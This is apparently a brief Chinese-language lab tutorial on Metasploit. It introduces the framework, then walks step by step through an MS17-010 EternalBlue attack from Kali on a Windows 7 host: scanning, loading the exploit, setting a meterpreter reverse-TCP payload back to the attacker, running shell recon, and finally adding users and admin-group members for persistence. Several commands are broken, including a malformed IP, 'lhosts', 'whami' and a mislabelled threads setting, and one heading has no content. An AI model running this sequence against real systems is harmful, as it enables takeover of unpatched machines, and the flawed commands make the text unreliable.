一 Matesploit的介绍
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
二 MSF的基本模块
三 msf漏洞利用流程
扫描靶机
[use auxiliary/scanner/smb/smb_ms17_010]
[set rhosts 192.1683.139.140]—设置要扫描的主机ip地址
[exploit]—开始攻击
选择exploit
[use exploit/windows/smb/ms17_010_eternalblue]—使用攻击模块
[show options]----查看需要设置的参数
[set rhosts 192.168.139.140]—设置被攻击主机ip地址
[set lhosts 192.168.139.153]—设置攻击主机ip地址
[set threads 512]—设置攻击主机ip地址
选择payload
[set payload windows/x64/meterpreter/reverse_tcp]—设置反弹到本机
攻击
[exploit]—开始攻击
四Ms17-010永恒之蓝漏洞利用
攻击机:Kali-Linux-2019.4-vmware-amd64 (IP:192.168.139.153)
靶机:Windows 7 X64 (IP:192.168.139.140)
[shell]
[whami]
[systeminfo]
[ipconfig]
接下来就可以 添加用户 修改密码 添加到超级管理员组